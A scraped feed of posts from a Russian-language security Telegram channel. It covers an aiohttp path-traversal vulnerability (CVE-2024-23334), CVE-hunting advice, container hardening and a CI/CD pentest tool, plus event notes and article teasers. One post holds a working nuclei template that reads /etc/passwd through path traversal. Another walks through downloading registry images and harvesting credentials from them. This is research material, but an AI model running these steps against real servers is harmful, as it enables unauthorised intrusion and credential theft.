Похек
16.4K subscribers
2.08K photos
110 videos
243 files
3.06K links
All materials published on the channel are for educational and informational purposes only.

Мнение автора ≠ мнение компании, где работает автор

Чат: @poxek_chat

Реклама: @PoxekAds_bot или
https://telega.in/c/poxek

РКН: https://clck.ru/3FsVhp
Download Telegram
Forwarded from Заметки Слонсера (Slonser)
Недавно нашел bypass всем известной библиотеки DOMPurify в одном интересном случае
Сегодня вышли версии с исправлениями
Прочитать разбор можно тут
🔓 Уязвимость в библиотеке aiohttp уже привлекла внимание хакеров 🔓
#CVE #python #red_team

Исследователи предупреждают, что недавно исправленная уязвимость в Python-библиотеке aiohttp (CVE-2024-23334) уже взята на вооружение хакерами, включая вымогательские группировки, такие как ShadowSyndicate.

Aiohttp — это опенсорсная библиотека, построенная на основе I/O фреймворка Asyncio и предназначенная для обработки большого количества одновременных HTTP-запросов без традиционного потокового нетворкинга. Aiohttp часто используется технологическими компаниями, веб-разработчиками, бэкенд-инженерами и специалистами по анализу данных для создания высокопроизводительных веб-приложений и сервисов, объединяющих данные из множества внешних API.

❤️ Шаблон для nuclei
id: "aiohttp"

info:
name: aiohttp LFI
author: crth0
severity: high
description: CVE-2024-23334 Check LFI.
reference:
- https://github.com/jhonnybonny
classification:
tags: aiohttp,LFI,CVE-2024-23334


http:
- method: GET
path:
- '{{BaseURL}}/static/../etc/passwd'
- '{{BaseURL}}/static/../../etc/passwd'
- '{{BaseURL}}/static/../../../etc/passwd'
- '{{BaseURL}}/static/../../../../etc/passwd'
- '{{BaseURL}}/static/../../../../../etc/passwd'
- '{{BaseURL}}/static/../../../../../../etc/passwd'
- '{{BaseURL}}/static/../../../../../../../etc/passwd'
- '{{BaseURL}}/static/../../../../../../../../etc/passwd'
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains(body, "root:")'
condition: and


по сути даже шаблона не нужно, тут обычный path traversal

🔓 Читать далее

❤️ PoC

🌚 @poxek
Please open Telegram to view this post
VIEW IN TELEGRAM
72
👍 Тэк, есть 2 новости. Плохая и хорошая. Выпьем за хорошую и закусим плохой.
#AMA #менторство

Хорошая новость в том, что у меня всё таки дотянулись руки доделать монтаж по AMA эфиру. Давно обещал, но только вот сделал. В телегу нативно выложить не смог, т.к. запись эфира весит 12 гб (2 часа 5 минут). И дабы не было проблем с авторскими правами на музыку из Яндекс Музыки решил на стриминговые площадки не заливать. На будущее учту это. Поэтому залил туда, где качество не зашакалиться при скачивании:

➡️ Скачать/посмотреть эфир

Плохая новость касается набора на менторство, заявок поступило более 50!! мы не ожидали, что будет столько желающих. Выбрали самых интересных на основе того, что вы писали в заявках. К сожалению многие по итогу сливались из-за того, что были не готовы платить приемлемые деньги за полугодовое обучение. Поэтому для тех, кто ещё думает или копит чеканные монеты будет следующий продут от меня через полгода +-. Так что ждите анонсов. Вчера был первый урок по менторству, полёт отличный 😏

📌 Stay tuned!
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥12🌚44
Как искать 0-day и как получить CVE?

Привет! Если тебе надоел баг баунти, то существует аналог в виде поиска 0-day уязвимостей и получения CVE в open source проектах. Но как именно это делать, где искать и как зарегистрировать CVE — этими секретами сегодня поделится с нами отличный application security специалист с 4-мя CVE за спиной и 4-мя годами опыта работы. Встречайте, друзья, @johnny_shein 👏

Шаг 1. Выбор цели
Beginner: Если вы хотите попрактиковаться или начать это дело, то цель можно найти на GitHub'е по поиску, например CMS, но со вкладкой "security". Если вкладка есть, то можно спокойно приступать к поиску багов. Её может и не быть, это значит, что придется искать контакты вендора и общаться с ним напрямую. Также стоит посмотреть, сколько звезд у проекта. Нужно минимум 300 звёзд. Это является небольшой гарантией того, что проект поддерживается, разработчики активные. И чем меньше звезд, тем больше шанс найти багу. Если брать WordPress, у него, хоть и много звёзд но он заисследован до дыр.
Skilled: Для более опытных ребят в этой теме существует сайт по баг-баунти для opensource проектов – https://huntr.com. В данный момент он больше делает уклон в AI-проекты, но можно найти и обычные. Также оттуда можно почитать репорты хантеров.

🖥 Шаг 2. Подготовка
После того, как вы определили, какой проект будете запускать, его нужно просто развернуть у себя на виртуальной машине. На GitHub я обычно смотрю, как происходит установка проекта; если она проста, то можно использовать. В основном я использую команды Docker для установки и просто разворачиваю проект у себя.

🔍 Шаг 3. Ищем 0-day
Чтобы найти 0-day, я читаю код. В первую очередь рассматриваю метод black box. Если какой-то механизм в проекте кажется интересным или payload не работает, я обращаюсь к коду. Также никто ничего не скажет вам, если пройдётесь по коду с использованием SAST и если подтвердить найденную уязвимость через динамику, то можно получить CVE.
P.S. Если хочешь увидеть как это делать на практике — загляни в полезные ссылки.

👮‍♀ Шаг 4. Регистрация CVE
Получить CVE можно через huntr использовав публикацию отчета, также придется говорить где в коде указать фикс уязвимости.
Можно через github, но нужно искать контакты разработчика, он будет сам регистрировать CVE, либо использовать фичу в gihub — advisory database

Легко ли найти 0-day?
Да, я нашел уязвимость Insufficient Session Expiration. Ее суть в том, что если в двух разных браузерах зайти на ресурс под одним аккаунтом, изменить пароль и разлогиниться, сессия в первом браузере остается активной.
За это мне и дали первую CVE 😉

🟢Полезные ссылки:
📶 Методика поиска 0-day уязвимостей на практике от RiotSecTeam
📶 Практика чтения уязвимого кода
📶 Отчеты баг хантеров с сайта huntr

ЧТНП | #web
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥212
Хороший сегодня день в Москве

Сегодня целый день на goCloud от Cloud.ru

А в конце ждёт концерт от The Hatters 🌚

🐈 А ещё нашел тут Женю @belka_e

⭐️ @poxek
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
8🔥6😁3
🖼️ Как собрать контейнер и не вооружить хакера

Известно, что с контейнерами бывает огромное количество разнообразных проблем, в том числе, связанных с информационной безопасностью. Как их избежать и не дать взломщику лазеек в ваш сервис — разбираемся в этой статье.

Проблемы с безопасностью
Типичные проблемы, связанные с информационной безопасностью контейнеров:

Уязвимые компоненты. Когда вы деплоите и собираете контейнер с уязвимыми компонентами, то они никуда не денутся и всегда будут в нём присутствовать.

Ошибки конфигурации. Когда в среде выполнения контейнеров или в самих контейнерах допущены ошибки при конфигурировании, злоумышленник может этим воспользоваться.

Наличие root-пользователя в контейнере. Эта проблема может звучать немного по-детски. Но это бич многих компаний — часто у них запускаются продукты от привилегированного пользователя внутри контейнеров. Тоже запускаете свои приложения в контейнере под root’ом? Мы расскажем, почему так однозначно не стоит делать.

➡️ Читать далее

🌚 @poxek
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥11😁1
Forwarded from Blue (h/c)at Café (Женя Белкин '";DROP DATABASE db_name();--)
🔺 Ускоряем пентест CI/CD
Пост должен был выйти чуть позже, но увидев, что скоро начнется соревнование для попадания на Standoff 13 👨‍💻 я решил выпустить его чуть раньше. Он может вам пригодиться, особенно, если оценивать прошлый год.

В последние годы пентестеры все больше обращают внимание на присутствие платформ DevOps, а уже и DevSecOps. Эти экосистемы состоят из различных сервисов, используемых в конвейерах CI/CD, включая:

🔵 Репозитории исходного кода (Gitlab, Gitea)

🔵 Реестры контейнеров (Docker Registry, Sonatype Nexus, JFrog)

🔵 Серверы автоматизации (Gitlab-CI, Jenkins)

🔵 Инструменты для обеспечения качества и безопасности кода (много об этом говорили).

Перспективы копать именно под CI/CD: Возможности и проблемы

Для злоумышленников и пентестеров экосистема CI/CD представляет собой "обоюдоострый меч" — богатство информации и потенциальные точки входа. Слияние множества сервисов, от репозиториев до серверов автоматизации, хранит в себе кучу данных, включая исходный код, образы контейнеров и различные учетные данные 🌐. Такая среда облегчает горизонтальное перемещение, а скомпрометированные API-токены открывают путь для дальнейшей эксплуатации.

Мой личный опыт работы показывает, что компрометация облачных сервисов через CI/CD — это быстрый путь к эскалации. (привет уязвимостям в GitLab 🤗)

📕

Пример таких уязвимостей:

CVE-2022-2185 — ТЫК
CVE-2021-22205 — ТЫК
CVE-2023-5009 — ТЫК
CVE-2023-7028 — ТЫК
CVE-2024-0402 — ТЫК


Но тут возникают сложности... множество целей в экосистеме CI/CD, зависимость от официальных API для атак и огромный объем данных требуют стратегического и автоматизированного подхода.

😜 Виновник поста или швейцарский нож для тестирования на проникновение в CI/CD

💻 Сразу ссылка на инструмент — ТЫК

Epyon был представлен в 2022 году как универсальный инструмент для работы пентестеров в экосистемах CI/CD. Разработанный на языке 💻, включает в себя ряд модулей, предназначенных для взаимодействия с распространенными системами DevOps, и легко интегрируется с такими инструментами, как Gitleaks и TruffleHog, для улучшения разведки и эксплуатации (именно этим мне он и понравился).

Модули Epyon охватывают широкий спектр, включая:

1. Gitlab
2. Github
3. Jenkins
4. Azure DevOps
5. Sonatype Nexus
6. Docker Registry
7. Sonarqube
8. Gitea
9. Artifactory
10. Terraform Cloud/Enterprise

✏️ Перейдем к тестам

Я протестировал его в своей домашней лаборатории, изучив модули Gitlab(community), Jenkins, Nexus(community) и Docker Registry (про него и поговорим).

Изначально хотел проверить на Gitlab, но столкнулся с проблемой. У меня слишком много проектов, которые пришлось бы скрывать, чтобы не показывать спойлеры для будущих проектов и стратап-идей.


Пример: HTTP API Docker Registry.

Команда epyon registry может быть использована для взаимодействия с реестром Docker:

Epyon позволяет пользователям легко взаимодействовать с API реестра и получать информацию о нескольких образах контейнеров. Следующий список показывает шаги, которые были выполнены в этом примере:

Шаг 01: Получить список образов

Опция list-images может быть использована для перечисления всех образов контейнеров.

Шаг 02: Получить теги для каждого образа

Опция list-tags получит все доступные теги для каждого образа.

Шаг 03: Скачать образы контейнеров

Опция download-images загрузит и извлечет содержимое образа (загруженные файлы будут помещены в каталог, указанный в файле config.yaml).

Шаг 04: Поиск учетных данных

Недавно в каком-то из чатов спрашивали про поиск учеток в докере. Так вот, как там и ответил, я буду использовать Trufflehog.

🥂 Profit

Вот нами уже и найдены login/pass, api key и много других критически важных артефактов

🛡 Заключение

В нашем деле важно уметь сокращать время, затрачиваемое на выполнение рутинных задач. И данный инструмент с этим справляется как нельзя кстати. Из минусов хочу отметить отсутствие тонкой настройки работы через конфиг, хотя сделать это через библиотеку go viper достаточно просто.

#redteam
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥1633
Live stream started
Live stream finished (7 minutes)
Как вам такой контент?)

p.s. спасибо битрейту телеги, за пиксели у подписчиков, а у меня нормальную картинку :D
8🐳2
Media is too big
VIEW IN TELEGRAM
Где ж вы ещё такой контент увидите))
😁166🌚3🔥2
Media is too big
VIEW IN TELEGRAM
85🌚4
Tinkoff CTF 2024: разбор демозадания

CTF — соревнования по спортивному хакингу: как олимпиадное программирование, но в информационной безопасности. Команды получают набор заданий на криптографию, анализ скомпилированного кода, веб-уязвимости и не только — на все те направления, с которыми работают профессионалы-безопасники.

Мы сделали соревнования в двух лигах: для опытных и новичков в CTF — тех, кто не специализируется на информационной безопасности и участвует в таком формате впервые. Под новичками имеем в виду опытных разработчиков, SRE- и QA-инженеров, аналитиков и других ИТ-специалистов.

Ребята из Тинькофф написали интересную статью про разбор демо таска с пентестом мобильного приложения. Получилось занимательно)

📌 Читать далее

🌚 @poxek
Please open Telegram to view this post
VIEW IN TELEGRAM
14🔥1😁1
Forwarded from BI.ZONE Bug Bounty
«Тинькофф»: миллион за баг

Скоуп в программе «Тинькофф» стал еще дороже — теперь можно получить баунти до миллиона рублей.

Самое время исследовать!
9🐳1
🔓 Go offline. Используем социальную инженерию в реальном мире 🔓

Са­мая зах­ватыва­ющая и роман­тизиро­ван­ная часть соци­аль­ной инже­нерии — это, конеч­но, офлайн‑ата­ки. Фишинг по элек­трон­ной поч­те — инте­рес­ный про­цесс, но в офлай­не пен­тестер по‑нас­тояще­му рас­кры­вает­ся как твор­ческая лич­ность. Вот об этой сто­роне искусс­тва соци­аль­ной инже­нерии мы сегод­ня и погово­рим, раз­берем прак­тичес­кие методы работы пен­тесте­ра в офлай­не, а так­же обсу­дим при­меры успешных атак.

С вос­хищени­ем мы слу­шаем исто­рии о том, как пен­тесте­ры готовят­ся к ата­ке, при­думы­вая под­ходящую леген­ду. Нап­ример, выда­ют себя за устра­ивающе­гося на работу соис­кателя, под­делыва­ют про­пуск, а потом про­ника­ют в периметр орга­низа­ции, под­клю­чают­ся к внут­ренней сети, химичат в сер­верной, рас­кле­ивают пла­каты с QR-кодами или прос­то раз­бра­сыва­ют флеш­ки с «сюр­при­зом». В этой статье мы раз­берем при­меры таких атак. Нес­коль­ко из них будут поза­имс­тво­ваны из моей кни­ги «Кон­тро­лиру­емый взлом. Биб­лия соци­аль­ной инже­нерии», кро­ме них, рас­смот­рим ряд дру­гих при­меров из интерне­та.

🔓 Читать далее

😹 @poxek
Please open Telegram to view this post
VIEW IN TELEGRAM
5
Stay safe ❤️
Please open Telegram to view this post
VIEW IN TELEGRAM
80😁64🐳2
Конференция goCloud от Cloud
Проходило сие действие в ЦДП (Центральный Дом Предпринимателя). Прекрасная локация, довелось в ней пару раз повыступать и очень много раз посещать в прошлом. Много вкусной еды, конференция шла с утра до вечера. Успели и наесться, и выпить :D Сидр был вкусный 🌚

На фото @kerzaster и @belka_e. Спасибо ребятам, за Успенскую компанию на конфе. У нас ещё в планах на след неделе посетить пару митапов и пару в начале апреля. Так что ждите 🤟

Доклады были ± норм, какие-то совсем бред или ни о чем, но было пару, которые было полезно и интересно слушать

Организация была на очень хорошем уровне, хотя в ЦДП не помню, чтобы было плохо) а также вход был бесплатный, получилось пообщаться с редактором Хабр вживую и ещё с парой весёлых людей, нетворинг входил в чат)

Спасибо команде Cloud.ru за эволюшен организацию! Зовите и пишите в будущем))

🌚 @poxek
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥2111😁2🐳1
Полезный проект - What2Log, который описывает минимальный, идеальный и экстремальный состав событий ИБ для регистрации в Linux Ubuntu и Windows (7 и 10), а также позволяет выбрать нужные и сгенерить готовый скрипт, который позволит вам включить нужные события 💡
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥10😁1
🔓 Code 27. Пентестим сети с наименьшим ущербом 🔓
#сети #red_team

MITM — это самая импак­тная ата­ка, которую мож­но про­вес­ти в сети. Но одновре­мен­но это и самая опас­ная тех­ника с точ­ки зре­ния рис­ков для инфраструк­туры. В этой статье Магама рас­ска­жет о том, как спу­фить при пен­тесте, что­бы ничего не сло­мать по дороге и не устро­ить DoS.

Нач­нем с теории. Магама показал, какие парамет­ры нуж­ны для кор­рек­тно­го про­веде­ния MITM. Эти нас­трой­ки поз­волят вам избе­жать неп­редна­мерен­ного DoS.

🔓 Читать далее

🌚 @poxek
Please open Telegram to view this post
VIEW IN TELEGRAM
13😁2